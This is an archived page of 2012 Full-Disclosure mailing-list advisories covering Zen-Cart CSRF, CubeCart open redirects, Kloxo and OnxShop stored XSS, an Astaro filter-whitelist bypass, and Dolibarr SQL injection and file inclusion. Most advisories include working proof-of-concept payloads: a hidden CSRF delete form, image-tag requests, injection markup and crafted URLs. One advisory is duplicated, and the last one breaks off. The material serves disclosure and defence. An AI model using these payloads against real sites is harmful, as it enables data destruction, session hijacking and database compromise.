headers
upsploit advisories | 10 Feb 17:10
Gravatar

Zen-Cart Admin CSRF/XSRF - Delete / Disable Products | UPS-2011-0018 | CVE-2011-4403

*Advisory Information*

Title: Zen-Cart Admin CSRF/XSRF - Delete / Disable Products
Date published: 2012-02-10 01:59:45 AM
upSploit Ref: UPS-2011-0018

CVE REF: CVE-2011-4403

*Advisory Summary*

An attacker can force an administrator to delete or disable products from within his store.

*Vendor*

Zen-Cart

*Affected Software*

Zen-Cart v1.3.9h

Zen Cart™ truly is the art of e-commerce; free, user-friendly, open source shopping cart software. The ecommerce web site design program is being developed by a group of like-minded shop owners, programmers, designers, and consultants that think ecommerce web design could be and should be done differently.

*Description of Issue*

This is a POC for CSRF on Zen-cart 1.3.9h admin control panel. By submitting this form from any location an attacker can cause the administrator to delete / disable products from his store.

*PoC*

Requirements

1. Admin user (target) must have a valid session id. Even if they have closed the admin window, this attack is still successful
2. The attacker must obtain the admin url
      * Social Engineer an admin user (trick them)
      * Packet Capture
      * Email headers
      * Invoice print out
      * * I know these have been addressed in your security forum topics, but most users are not aware of these issues
3. The attacker must obtain the product id
      * This is public information
4. The attack must then social engineer (trick them) into loading the page
      * Email with images
      * Post a forum topic with the images
      * Link them to a page on the attacker’s server

Proof of Concept

Delete:

This form can be hidden and made to submit automatically on page load:

<form name="products" action="http://www.mysite.com/path_to_admin/product.php?action=delete_product_confirm" method="post">
<label for="securityToken">Security Token</label><br/><input type="text" name="securityToken" value="Can be anything…" /><br/><br/>
<label for="products_id">Products ID</label><br/><input type="text" name="products_id" value="329"><br/><br/>
<label for="product_categories[]">Products Category</label><br/><input type="text" value="48" name="product_categories[]"><br/><br/>
<input type="submit" border="0" alt="Delete" value=" Delete Product">
</form>

Disable:

<img src="http://www.mysite.com/path_to_admin/categories.php?action=setflag&flag=0&pID=1"/>
<img src="http://www.mysite.com/path_to_admin/categories.php?action=setflag&flag=0&pID=2"/>
<img src="http://www.mysite.com/path_to_admin/categories.php?action=setflag&flag=0&pID=3"/>
<img src="http://www.mysite.com/path_to_admin/categories.php?action=setflag&flag=0&pID=4"/>
<img src="http://www.mysite.com/path_to_admin/categories.php?action=setflag&flag=0&pID=5"/>

Proposed Solution

* Add the security token conditional statement to the delete_product_confirm.php for all product types
* This should be applied to all requests made within the admin control panel rather than just key operations

*Credits*

DisK0nn3cT

*References*

http://www.zen-cart.com/
http://www.owasp.org/index.php/Testing_for_CSRF_(OWASP-SM-005)

*Patch/Fix*

Update to the latest version

_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/
Permalink | Reply | 0 comments |
headers
YGN Ethical Hacker Group | 10 Feb 17:01
Favicon
Gravatar

CubeCart 3.0.20 (3.0.x) and lower | Open URL Redirection Vulnerability

1. OVERVIEW

The CubeCart 3.0.20 and lower versions are vulnerable to Open URL Redirection.

2. BACKGROUND

CubeCart is an "out of the box" ecommerce shopping cart software
solution which has been written to run on servers that have PHP &
MySQL support. With CubeCart you can quickly setup a powerful online
store which can be used to sell digital or tangible products to new
and existing customers all over the world.

3. VULNERABILITY DESCRIPTION

The CubeCart 3.0.20 and lower versions contain a flaw that allows a
remote cross site redirection attack. This flaw exists because the
application does not properly sanitise the parameters,"goto" and "r".
This allows an attacker to create a specially crafted URL, that if
clicked, would redirect a victim from the intended legitimate web site
(domain.com) to an arbitrary web site (localhost) of the attacker's
choice.

4. VERSIONS AFFECTED

3.0.20 and lower (aka 3.0.x family)

5. PROOF-OF-CONCEPT/EXPLOIT

http://localhost/cube3.0.20/switch.php?r=//yehg.net/&lang=es
http://localhost/cube3.0.20/admin/login.php?goto=//yehg.net

6. SOLUTION

The CubeCart 3.0.x version family is no longer maintained by the vendor.
Upgrade to CubeCart 4x/5.x.

7. VENDOR

CubeCart Development Team
http://cubecart.com/

8. CREDIT

Aung Khant, http://yehg.net, YGN Ethical Hacker Group, Myanmar.

9. DISCLOSURE TIME-LINE

2012-02-10: CubeCart 3.0.x in End-of-Support/Maintenance circle
2012-02-10: Vulnerability disclosed

10. REFERENCES

Original Advisory URL:
http://yehg.net/lab/pr0js/advisories/[cubecart_3.0.20_3.0.x]_open_url_redirection
CubeCart Home Page: http://cubecart.com/
OWASP Top 10 2010 - A 10:
http://www.owasp.org/index.php/Top_10_2010-A10-Unvalidated_Redirects_and_Forwards
SANS Top 25: http://cwe.mitre.org/top25/#CWE-601
CWE-601: http://cwe.mitre.org/data/definitions/601.html
	
#yehg [2012-02-10]

_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/
Permalink | Reply | 0 comments |
headers
research@vulnerability-lab.com | 10 Feb 15:25
Favicon

Linux Kloxo LxCenter Server CP v6.1.10 - Multiple Web Vulnerabilities

Title:
======
Kloxo LxCenter Server CP v6.1.10 - Multiple Web Vulnerabilities

Date:
=====
2012-02-10

References:
===========
http://www.vulnerability-lab.com/get_content.php?id=429

VL-ID:
=====
429

Introduction:
=============
Scriptable, distributed and object oriented Hosting Platform. Manage
Clients, Resellers,
Domains, Backups, Stats, Mails and Databases. Manage everything!

(Copy of the Vendor Homepage: http://www.lxcenter.org/)

Abstract:
=========
Vulnerability-Lab Team  discovered multiple web vulnerabilities on
Kloxos LxCenter Server CP v6.1.10.

Report-Timeline:
================
2012-02-10:    Public or Non-Public Disclosure

Status:
========
Unpublished

Exploitation-Technique:
=======================
Remote

Severity:
=========
Medium

Details:
========
Multiple persistant input validation vulnerabilities are detected on
Kloxos LxCenter Server CP v6.1.10.
The bug allows remote attacker to implement malicious script code on the
application side (persistent).
Successful exploitation of the vulnerability allows an attacker to
manipulate modules/context (persistent) & can
lead to session hijacking (user/mod/admin).

Vulnerable Module(s):
                            [+] LocalHost {Command Center}
                            [+] Server > Information > Verbose Settings

Picture(s):
                            ../1.png
                            ../2.png

Proof of Concept:
=================
The vulnerabilities can be exploited by remote attackers with medium
required user inter action. For demonstration or reproduce ...

1.1
Localhost {Command Center}

<script> global_need_list = new Array(); </script><script>
global_match_list = new Array(); </script><script>
global_desc_list = new Array(); </script><form onsubmit=``return
check_for_needed_variables(`command_centerlocalhost`);``
method=``post`` enctype=``multipart/form-data`` action=``/display.php``
id=``command_centerlocalhost`` name=``command_centerlocalhost``>
<fieldset style=``background-color: rgb(255, 255, 255); border: 0px
none; padding: 10px;`` width=``90%``><legend style=``
font-weight: normal; border: 0px none;``><font color=``#303030``
style=``font-weight: bold;``>Command Center for localhost  
</font> </legend></fieldset>   <div align=``left``
style=``background-color: rgb(255, 255, 255); width: 90%;``><div align=``
left`` style=``width: 500px; border: 1px solid rgb(177, 192,
240);``><input type=``hidden`` value=``pserver``
name=``frm_o_o[0][class]``/>
 <input type=``hidden`` value=``localhost`` name=``frm_o_o[0][nname]``/>
 <div align=``left`` style=``padding: 10px; background-color: rgb(250,
248, 248); display: block;``> Command  <br/> 
... or
<input width=``60%`` type=``text`` value=``
name=``frm_pserver_c_ccenter_command``
class=``frm_pserver_c_ccenter_command textbox``/>
<iframe size=``30`` <``=`` [PERSISTENT SCRIPT CODE INJECT!]` src=``a``>
</div> <div align=left style=`padding:10 10 10 10 ;border-top
:1px solid #aaaaaa; background-color:#ffffff;display:block` > Output 
<br> <textarea nowrap  id=textarea_ class=
frmtextarea rows=10 style=`margin:0 0 0 50;width:85%;height:200px;`
name=`` size=30  ></textarea>
<script
type=``text/javascript``>createTextAreaWithLines(`textarea_`);</script>
<style>

1.2
Server => Information => 2 x Verbose Input

<font color=``#303030`` style=``font-weight: bold;``>Information for
localhost   </font> </legend></fieldset>  
<div align=``left`` style=``background-color: rgb(255, 255, 255); width:
90%;``><div align=``left`` style=``width: 500px; border: 1px
solid rgb(177, 192, 240);``><input type=``hidden`` value=``pserver``
name=``frm_o_o[0][class]``/>
 <input type=``hidden`` value=``localhost``
name=``frm_o_o[0][nname]``/>
 <script> global_need_list[`frm_pserver_c_description`] = `Verbose
Description (to Identify)`; </script>
<div align=``left`` style=``padding: 10px; background-color: rgb(250,
248, 248); display: block;``> Verbose Description (to Identify)
<font color=``red``><sup>*</sup></font> <br/> 
<input width=``60%`` type=``text`` [PERSISTENT SCRIPT CODE INJECT!]``
<iframe=`` value=``
>`` name=``frm_pserver_c_description`` class=``frm_pserver_c_description
textbox``/>``  size=``30``> </div> <div align=``left`` style=``
padding: 10px; border-top: 1px solid rgb(170, 170, 170);
background-color: rgb(255, 255, 255); display: block;``> FQDN Hostname 
<br/> 

<input width=``60%`` type=``text`` [PERSISTENT SCRIPT CODE INJECT!]``
<iframe=`` value=``>`` name=``frm_pserver_c_realhostname`` class=``
frm_pserver_c_realhostname textbox``/>``  size=``30``> </div> <div
align=``left`` style=``padding: 10px; border-top: 1px solid rgb(170,
170, 170); background-color: rgb(250, 248, 248); display: block;``> Load
Threshold At Which Warning Is Sent  <br/> 
<input width=``60%``
type=``text`` size=``30`` value=``20``
name=``frm_pserver_c_load_threshold``
class=``frm_pserver_c_load_threshold textbox``/> </div> <input type=
``hidden`` value=``update`` name=``frm_action``/>
 <input type=``hidden`` value=``information`` name=``frm_subaction``/>

Reference(s):
                ../command-center.txt
                ../server-verbose-input.txt

Risk:
=====
The security risk of the persistent input validation vulnerabilities is
estimated as medium(+).

Credits:
========
Vulnerability Research Laboratory   -    N/A  Anonymous

Disclaimer:
===========
The information provided in this advisory is provided as it is without
any warranty. Vulnerability-Lab disclaims all warranties,
either expressed or implied, including the warranties of merchantability
and capability for a particular purpose. Vulnerability-
Lab or its suppliers are not liable in any case of damage, including
direct, indirect, incidental, consequential loss of business
profits or special damages, even if Vulnerability-Lab or its suppliers
have been advised of the possibility of such damages. Some
states do not allow the exclusion or limitation of liability for
consequential or incidental damages so the foregoing limitation
may not apply. Any modified copy or reproduction, including partially
usages, of this file requires authorization from Vulnerability-
Lab. Permission to electronically redistribute this alert in its
unmodified form is granted. All other rights, including the use of
other media, are reserved by Vulnerability-Lab or its suppliers.

                            Copyright © 2012|Vulnerability-Lab

--

-- 
Website: www.vulnerability-lab.com ; vuln-lab.com or vuln-db.com
Contact: admin <at> vulnerability-lab.com or support <at> vulnerability-lab.com

_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/
Permalink | Reply | 0 comments |
headers
upsploit advisories | 10 Feb 12:00
Gravatar

Astaro Security Gateway - bypass using whitelist domain pattern weakness

*Advisory Information* 

Title: Astaro Security Gateway - bypass using whitelist domain pattern weakness

upSploit Ref: UPS-2011-0041



*Advisory Summary*

Astaro Security Gateway's default Web Filtering Exceptions allow specially-named domains to bypass security features of the firewall.

*Vendor*

Astaro


*Affected Software*

Astaro Security Gateway

"Astaro Security Gateway hardware, software, and virtual appliances provide full Unified Threat Management protection. All platforms include the complete feature set and the same ease-of-use." - http://www.astaro.com/


*Description of Issue*

Astaro Security Gateway - Home edition was used, other versions may be affected.

In the ASG WebAdmin console, choose Web Security, Web Filtering, Exceptions. The following regular expressions form a default whitelist that allow bypassing of the firewall's features at varying levels to achieve compatibility (one would assume):

^https?://[A-Za-z0-9.-]*adobe.com/
^https?://[A-Za-z0-9.-]*apple.com/
^https?://[A-Za-z0-9.-]*windowsupdate.com/
^https?://[A-Za-z0-9.-]*microsoft.com/

However, a savvy attacker need only serve malware from a drive-by web site named www.exampleadobe.com (which would match the first regular expression above) and the features of the firewall that would be bypassed include: Antivirus / Extension blocking / Content Removal / Authentication / URL Filter.

The regular expressions need to be fixed to ensure the domain cannot be prefixed with other letters.


*PoC*

Use of a domain name such as www.exampleadobe.com to serve up EICAR virus (untested).

*Fix*

Update to the latest version


*Credits*

Timeless Prototype


*References*

_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/
Permalink | Reply | 0 comments |
headers
research@vulnerability-lab.com | 10 Feb 12:28
Favicon

Indianapolis Superbowl 2012 - SQL Injection Vulnerabilities

Title:
======
Indianapolis Superbowl 2012 - SQL Injection Vulnerabilities

Date:
=====
2012-02-06

VL-ID:
=====
418

Abstract:
=========
Alexander Fuchs discovered 2 remote SQL Injection Vulnerabilities on the official website of
Indianapolis Superbowl 2012 (US).

Status:
========
Verified by Laboratory

Severity:
=========
High

Disclaimer:
===========
The information provided in this advisory is provided as it is without any warranty. Vulnerability-Lab
disclaims all warranties, 
either expressed or implied, including the warranties of merchantability and capability for a
particular purpose. Vulnerability-
Lab or its suppliers are not liable in any case of damage, including direct, indirect, incidental,
consequential loss of business 
profits or special damages, even if Vulnerability-Lab or its suppliers have been advised of the
possibility of such damages. Some 
states do not allow the exclusion or limitation of liability for consequential or incidental damages so
the foregoing limitation 
may not apply. Any modified copy or reproduction, including partially usages, of this file requires
authorization from Vulnerability-
Lab. Permission to electronically redistribute this alert in its unmodified form is granted. All other
rights, including the use of 
other media, are reserved by Vulnerability-Lab or its suppliers.

    						Copyright © 2012|Vulnerability-Lab

--

-- 
Website: www.vulnerability-lab.com ; vuln-lab.com or vuln-db.com
Contact: admin <at> vulnerability-lab.com or support <at> vulnerability-lab.com

_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/
Permalink | Reply | 1 comment |
headers
research@vulnerability-lab.com | 10 Feb 11:55
Favicon

Dolibarr CMS v3.2.0 Alpha - SQL Injection Vulnerabilities

Title:
======
Dolibarr CMS v3.2.0 Alpha - SQL Injection Vulnerabilities

Date:
=====
2012-02-09

References:
===========
http://www.vulnerability-lab.com/get_content.php?id=427

VL-ID:
=====
427

Introduction:
=============
Dolibarr ERP & CRM is a modern software to manage your company or foundation activity (contacts,
suppliers, 
invoices, orders, stocks, agenda, ...). It s an opensource free software designed for small and medium 
companies, foundations and freelances. You can install, use and distribute it as a standalone
application 
or as a web application (on mutualized or dedicated server, or on SaaS or Cloud solutions) and use it with 
any devices (desktop, smartphone, tablet).

(Copy of the Vendor Homepage: http://www.dolibarr.org/)

Abstract:
=========
Vulnerability-Lab researcher discovered a remote SQL Injection vulnerability on Dolibarrs CMS v3.2.0 Alpha.

Report-Timeline:
================
2011-02-09:	Public or Non-Public Disclosure

Status:
========
Published

Exploitation-Technique:
=======================
Remote

Severity:
=========
High

Details:
========
Multiple remote SQL Injection vulnerabilities are detected on Dolibarrs Content Management System
v3.2.0 Alpha.
The vulnerability allows an attacker (remote) or local low privileged user account to inject/execute own
sql commands 
on the affected application dbms. Successful exploitation of the vulnerability results in dbms &
application compromise.

Vulnerable Module(s):
					[+] Member List
					[+] Row ID

--- Error/Exception Logs ---
Das System hat einen technischen Fehler festgestellt.
Diese Informationen könnten bei der Diagnose des Fehlers behilflich sein:
Datum: 20120209164847
Dolibarr: 3.2.0-alpha
Funktions-Level: 0
PHP: 5.2.4-2ubuntu5.19
Server: Apache

Angeforderte URL: /adherents/fiche.php?rowid=-1%27
Menüverwaltung: eldy_backoffice.php

Datenbanktyp-Verwaltung: mysql
Anfrage des letzten Datenbankzugriffs mit Fehler: SELECT d.rowid, d.civilite, d.prenom as firstname,
d.nom as lastname, 
d.societe, d.fk_soc, d.statut, d.public, d.adresse as address, d.cp as zip, d.ville as town, d.note,
d.email, d.phone, 
d.phone_perso, d.phone_mobile, d.login, d.pass, d.photo, d.fk_adherent_type, d.morphy, d.datec as
datec, d.tms as datem, 
d.datefin as datefin, d.naiss as datenaiss, d.datevalid as datev, d.pays, d.fk_departement, p.rowid as
country_id, p.code 
as country_code, p.libelle as country, dep.nom as state, dep.code_departement as state_code,
t.libelle as type, t.cotisation 
as cotisation, u.rowid as user_id, u.login as user_login FROM llx_adherent_type as t, llx_adherent as d
LEFT JOIN llx_c_pays 
as p ON d.pays = p.rowid LEFT JOIN llx_c_departements as dep ON d.fk_departement = dep.rowid LEFT JOIN
llx_user as u ON d.rowid 
= u.fk_member WHERE d.fk_adherent_type = t.rowid AND d.entity = 1 AND d.rowid=-1\\\\\\\'
Return-Code des letzten Datenbankzugriffs mit Fehler: DB_ERROR_SYNTAX
Inhalt des letzten Datenbankzugriffs mit Fehler: You have an error in your SQL syntax; check the manual
that corresponds to 
your MySQL server version for the right syntax to use near \\\\\\\'\\\\\\\'\\\\\\\' at line 1

Message: You have an error in your SQL syntax; check the manual that corresponds to your MySQL server
version 
for the right syntax to use near \\\\\\\'\\\\\\\'\\\\\\\' at line 1

Picture(s):
					../1.png
					../2.png

Proof of Concept:
=================
The vulnerabilities can be exploited by remote attackers or local low privileged user accounts. For
demonstration or reproduce ...

1.1
1. Login to the Panel
2. Open the list.php
3. Include the following example string -
 on the memberslist -%20`

1.2
http://demo.dolibarr.org/adherents/fiche.php?rowid=-1%27[SQL Injection Vulnerability!]

Risk:
=====
The security risk of the sql injection vulnerabilities are stimated as high(+).

Credits:
========
Vulnerability Research Laboratory   -    Benjamin Kunz Mejri   & Ucha Gobejishvili

Disclaimer:
===========
The information provided in this advisory is provided as it is without any warranty. Vulnerability-Lab
disclaims all warranties, 
either expressed or implied, including the warranties of merchantability and capability for a
particular purpose. Vulnerability-
Lab or its suppliers are not liable in any case of damage, including direct, indirect, incidental,
consequential loss of business 
profits or special damages, even if Vulnerability-Lab or its suppliers have been advised of the
possibility of such damages. Some 
states do not allow the exclusion or limitation of liability for consequential or incidental damages so
the foregoing limitation 
may not apply. Any modified copy or reproduction, including partially usages, of this file requires
authorization from Vulnerability-
Lab. Permission to electronically redistribute this alert in its unmodified form is granted. All other
rights, including the use of 
other media, are reserved by Vulnerability-Lab or its suppliers.

    						Copyright © 2012|Vulnerability-Lab

--

-- 
Website: www.vulnerability-lab.com ; vuln-lab.com or vuln-db.com
Contact: admin <at> vulnerability-lab.com or support <at> vulnerability-lab.com

_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/
Permalink | Reply | 0 comments |
headers
research@vulnerability-lab.com | 10 Feb 11:54
Favicon

Dolibarr CMS v3.2.0 Alpha - SQL Injection Vulnerabilities

Title:
======
Dolibarr CMS v3.2.0 Alpha - SQL Injection Vulnerabilities

Date:
=====
2012-02-09

References:
===========
http://www.vulnerability-lab.com/get_content.php?id=427

VL-ID:
=====
427

Introduction:
=============
Dolibarr ERP & CRM is a modern software to manage your company or foundation activity (contacts,
suppliers, 
invoices, orders, stocks, agenda, ...). It s an opensource free software designed for small and medium 
companies, foundations and freelances. You can install, use and distribute it as a standalone
application 
or as a web application (on mutualized or dedicated server, or on SaaS or Cloud solutions) and use it with 
any devices (desktop, smartphone, tablet).

(Copy of the Vendor Homepage: http://www.dolibarr.org/)

Abstract:
=========
Vulnerability-Lab researcher discovered a remote SQL Injection vulnerability on Dolibarrs CMS v3.2.0 Alpha.

Report-Timeline:
================
2011-02-09:	Public or Non-Public Disclosure

Status:
========
Published

Exploitation-Technique:
=======================
Remote

Severity:
=========
High

Details:
========
Multiple remote SQL Injection vulnerabilities are detected on Dolibarrs Content Management System
v3.2.0 Alpha.
The vulnerability allows an attacker (remote) or local low privileged user account to inject/execute own
sql commands 
on the affected application dbms. Successful exploitation of the vulnerability results in dbms &
application compromise.

Vulnerable Module(s):
					[+] Member List
					[+] Row ID

--- Error/Exception Logs ---
Das System hat einen technischen Fehler festgestellt.
Diese Informationen könnten bei der Diagnose des Fehlers behilflich sein:
Datum: 20120209164847
Dolibarr: 3.2.0-alpha
Funktions-Level: 0
PHP: 5.2.4-2ubuntu5.19
Server: Apache

Angeforderte URL: /adherents/fiche.php?rowid=-1%27
Menüverwaltung: eldy_backoffice.php

Datenbanktyp-Verwaltung: mysql
Anfrage des letzten Datenbankzugriffs mit Fehler: SELECT d.rowid, d.civilite, d.prenom as firstname,
d.nom as lastname, 
d.societe, d.fk_soc, d.statut, d.public, d.adresse as address, d.cp as zip, d.ville as town, d.note,
d.email, d.phone, 
d.phone_perso, d.phone_mobile, d.login, d.pass, d.photo, d.fk_adherent_type, d.morphy, d.datec as
datec, d.tms as datem, 
d.datefin as datefin, d.naiss as datenaiss, d.datevalid as datev, d.pays, d.fk_departement, p.rowid as
country_id, p.code 
as country_code, p.libelle as country, dep.nom as state, dep.code_departement as state_code,
t.libelle as type, t.cotisation 
as cotisation, u.rowid as user_id, u.login as user_login FROM llx_adherent_type as t, llx_adherent as d
LEFT JOIN llx_c_pays 
as p ON d.pays = p.rowid LEFT JOIN llx_c_departements as dep ON d.fk_departement = dep.rowid LEFT JOIN
llx_user as u ON d.rowid 
= u.fk_member WHERE d.fk_adherent_type = t.rowid AND d.entity = 1 AND d.rowid=-1\\\\\\\'
Return-Code des letzten Datenbankzugriffs mit Fehler: DB_ERROR_SYNTAX
Inhalt des letzten Datenbankzugriffs mit Fehler: You have an error in your SQL syntax; check the manual
that corresponds to 
your MySQL server version for the right syntax to use near \\\\\\\'\\\\\\\'\\\\\\\' at line 1

Message: You have an error in your SQL syntax; check the manual that corresponds to your MySQL server
version 
for the right syntax to use near \\\\\\\'\\\\\\\'\\\\\\\' at line 1

Picture(s):
					../1.png
					../2.png

Proof of Concept:
=================
The vulnerabilities can be exploited by remote attackers or local low privileged user accounts. For
demonstration or reproduce ...

1.1
1. Login to the Panel
2. Open the list.php
3. Include the following example string -
 on the memberslist -%20`

1.2
http://demo.dolibarr.org/adherents/fiche.php?rowid=-1%27[SQL Injection Vulnerability!]

Risk:
=====
The security risk of the sql injection vulnerabilities are stimated as high(+).

Credits:
========
Vulnerability Research Laboratory   -    Benjamin Kunz Mejri   & Ucha Gobejishvili

Disclaimer:
===========
The information provided in this advisory is provided as it is without any warranty. Vulnerability-Lab
disclaims all warranties, 
either expressed or implied, including the warranties of merchantability and capability for a
particular purpose. Vulnerability-
Lab or its suppliers are not liable in any case of damage, including direct, indirect, incidental,
consequential loss of business 
profits or special damages, even if Vulnerability-Lab or its suppliers have been advised of the
possibility of such damages. Some 
states do not allow the exclusion or limitation of liability for consequential or incidental damages so
the foregoing limitation 
may not apply. Any modified copy or reproduction, including partially usages, of this file requires
authorization from Vulnerability-
Lab. Permission to electronically redistribute this alert in its unmodified form is granted. All other
rights, including the use of 
other media, are reserved by Vulnerability-Lab or its suppliers.

    						Copyright © 2012|Vulnerability-Lab

--

-- 
Website: www.vulnerability-lab.com ; vuln-lab.com or vuln-db.com
Contact: admin <at> vulnerability-lab.com or support <at> vulnerability-lab.com

_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/
Permalink | Reply | 0 comments |
headers
research@vulnerability-lab.com | 10 Feb 11:53
Favicon

OnxShop CMS v1.5.0 - Multiple Web Vulnerabilities

Title:
======
OnxShop CMS v1.5.0 - Multiple Web Vulnerabilities

Date:
=====
2012-02-08

References:
===========
http://www.vulnerability-lab.com/get_content.php?id=426

VL-ID:
=====
426

Introduction:
=============
Onxshop is not only great CMS offering integrated in-context editing and full design freedom without the
constraints 
of limiting templates, but it s also stable ecommerce platform used in production environment since 2006.
Flexible layout 
modules, which support nesting based on the Fibonacci sequence Complete HTML/CSS framework, which
allows you to use the 
same HTML and core CSS for multiple websites with different branding and designs. 

Simplified MVC paradigm using Model = Storage Access (SQL and PHP), View = Presentation to client (simple
HTML engine), 
Controller = Handling actions (request processing in PHP to produce View). 
To put it simply, you will not see the $align option in Model or Controller or the SQL query in Controller
Flexible routing system which allows each component to be called on its own (useful for AJAX)
The option to rewrite each template, model or controller specifically for a project, so developers can add
their own 
stamp to the system. Common components that are all built directly by our core team, which means that 99% of
projects 
don\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\'t need to install external components. This eliminates problems
with incompatible components (extensions/modules/plugins) 
which affects some CMS software. Behavioural targeting support in the core system and many other
components. An all in one system - 
content management system, blog, product catalogue and checkout process all rolled into one. This allows
users share the same 
category system and media library across their product catalogue and blog articles, or include an “add
to basket” button in 
blog posts about a product. There isn t any other web system in the universe which can do this with such ease.
One fulltext search for the CMS, eCommerce and blog. 

Onxshop is a new kind of Content Management System (Shop|eCommerce). Onxshop is currently used by more
than 50 
businesses around the world, and that figure is growing all the time.

(Copy of the Vendor Homepage: http://http://onxshop.com/)

Abstract:
=========
Vulnerability-Lab Team  discovered multiple web vulnerabilities on Onxshops Content Management System v1.5.0

Report-Timeline:
================
2012-02-09:	Public or Non-Public Disclosure

Status:
========
Published

Exploitation-Technique:
=======================
Remote

Severity:
=========
Medium

Details:
========
Multiple persistant input validation vulnerabilities are detected on on Onxshops Content Management
System v1.5.0. 
The bug allows remote attacker to implement malicious script code on the application side (persistent).
Successful exploitation of the vulnerability allows an attacker to manipulate modules/context
(persistent) & can 
lead to session hijacking (user/mod/admin).

Vulnerable Module(s):
							[+] Pages - Title
							[+] Search - Keywords & Inputs
							[+] Vochou

Pictures:
							../1.png
							../2.png
							../3.png

Proof of Concept:
=================
The vulnerabilities can be exploited by remote attackers with medium required user inter action. For
demonstration or reproduce ...

1.
<tr id="node_id_1194">
<td><a onclick="openEdit('/popup/properties/1194/orig/page/88')" href="javascript:void(1194)
" class="">">&#8203;&#8203;&#8203;&#8203;&#8203;<iframe a="" <<=""
onload='alert("VulnerabilityLab")' src="a"></td>
<td>page/default</td>
<td>0</td>
<td>0</td>
<td><div class="onxshop_page_properties"><a class="onxshop_delete"
title="Delete default" href="#1194"><span>Delete</span></a></div></td></tr>
</tbody>
	</table>

2.
<div id="breadCrumb">
   <a href="/reports">Reports</a> <span style="font-size:8px;">></span><span class="location">
   "><img src="http://www.vulnerability-lab.com/gfx/partners/vlab.png" onLoad=alert(1337);></span>	[X]
</div>

...or

<option value="all">All Orders</option></select>
</span>
</div><div class="row search">

<span class="label"><label>Search query</label></span>
<span class="field">
&#8203;&#8203;&#8203;&#8203;&#8203;<input width="800" type="text" height="800"
src="http://vulnerability-lab.com" <iframe="" 
value=">" name="order-list-filter[query]" id="query"/>" /></span></div>

<div class="row registered_between">
<span class="label"><label>Created between</label></span>

<span class="field">
<input width="800" type="text" height="800" src="http://vulnerability-lab.com" 
<iframe="" value=">" name="order-list-filter[created_from]"
id="order-list-filter-created_from" 
class="text hasDatepicker"/>" />
<input width="800" type="text" height="800" 
src="http://vulnerability-lab.com" <iframe="" value=">" name="order-list-filter[created_to]" id="order-list-
filter-created_to" class="text hasDatepicker"/>" /></span>&#8203;&#8203;&#8203;&#8203;&#8203;
	

3.
<tr class="disabled">
<td><a href="#promotionEdit" onclick="makeAjaxRequest('#promotionEdit', 
'/request/bo/component/ecommerce/promotion_edit~id=2~');" title="Edit promotion settings">>"&#8203;&#8203;&#8203;&#8203;&#8203;
<iframe width="800" height="800" src="http://vulnerability-lab.com"></a></td>
<td>>"<iframe src=http://vulnerability-lab.com width=800 height=800></td>

<td class="number">0</td>
<td class="money">£0.00</td>
<td class="money">£0.00</td>
</tr>

Reference(s):
				../pages.txt
				../search.txt
				../vouchers-name.txt

Risk:
=====
The security risk of the persistant input validation vulnerabilities are estimated as medium.

Credits:
========
Vulnerability Research Laboratory   -    N/A  Anonymous

Disclaimer:
===========
The information provided in this advisory is provided as it is without any warranty. Vulnerability-Lab
disclaims all warranties, 
either expressed or implied, including the warranties of merchantability and capability for a
particular purpose. Vulnerability-
Lab or its suppliers are not liable in any case of damage, including direct, indirect, incidental,
consequential loss of business 
profits or special damages, even if Vulnerability-Lab or its suppliers have been advised of the
possibility of such damages. Some 
states do not allow the exclusion or limitation of liability for consequential or incidental damages so
the foregoing limitation 
may not apply. Any modified copy or reproduction, including partially usages, of this file requires
authorization from Vulnerability-
Lab. Permission to electronically redistribute this alert in its unmodified form is granted. All other
rights, including the use of 
other media, are reserved by Vulnerability-Lab or its suppliers.

    						Copyright © 2012|Vulnerability-Lab

--

-- 
Website: www.vulnerability-lab.com ; vuln-lab.com or vuln-db.com
Contact: admin <at> vulnerability-lab.com or support <at> vulnerability-lab.com

_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/
Permalink | Reply | 0 comments |
headers
research@vulnerability-lab.com | 10 Feb 11:51
Favicon

Dolibarr CMS v3.2.0 Alpha - File Include Vulnerabilities

Title:
======
Dolibarr CMS v3.2.0 Alpha - File Include Vulnerabilities

Date:
=====
2012-02-07

References:
===========
http://www.vulnerability-lab.com/get_content.php?id=428

VL-ID:
=====
428

Introduction:
=============
Dolibarr ERP & CRM is a modern software to manage your company or foundation activity (contacts,
suppliers, 
invoices, orders, stocks, agenda, ...). It s an opensource free software designed for small and medium 
companies, foundations and freelances. You can install, use and distribute it as a standalone
application 
or as a web application (on mutualized or dedicated server, or on SaaS or Cloud solutions) and use it with 
any devices (desktop, smartphone, tablet).

(Copy of the Vendor Homepage: http://www.dolibarr.org/)

Abstract:
=========
Vulnerability-Lab researcher discovered a multiple File Include Vulnerabilities on Dolibarrs CMS
v3.2.0 Alpha.

Report-Timeline:
================
2011-02-08:	Public or Non-Public Disclosure

Status:
========
Published

Exploitation-Technique:
=======================
Remote

Severity:
=========
Critical

Details:
========
Multiple File Include Vulnerabilities are detected on Dolibarrs Content Management System v3.2.0 Alpha.
The vulnerability allows an attacker (remote) or local low privileged user account to request local
web-server 
or system files.  Successful exploitation of the vulnerability results in dbms & application compromise.

Vulnerable Module(s):
					[+] ?modulepart=project&file=
					[+] ?action=create&actioncode=AC_RDV&contactid=1&socid=1&backtopage=

Picture(s):
					../1.png
					../2.png

Proof of Concept:
=================
The vulnerabilities can be exploited by remote attackers or local low privileged user accounts. For
demonstration or reproduce ...

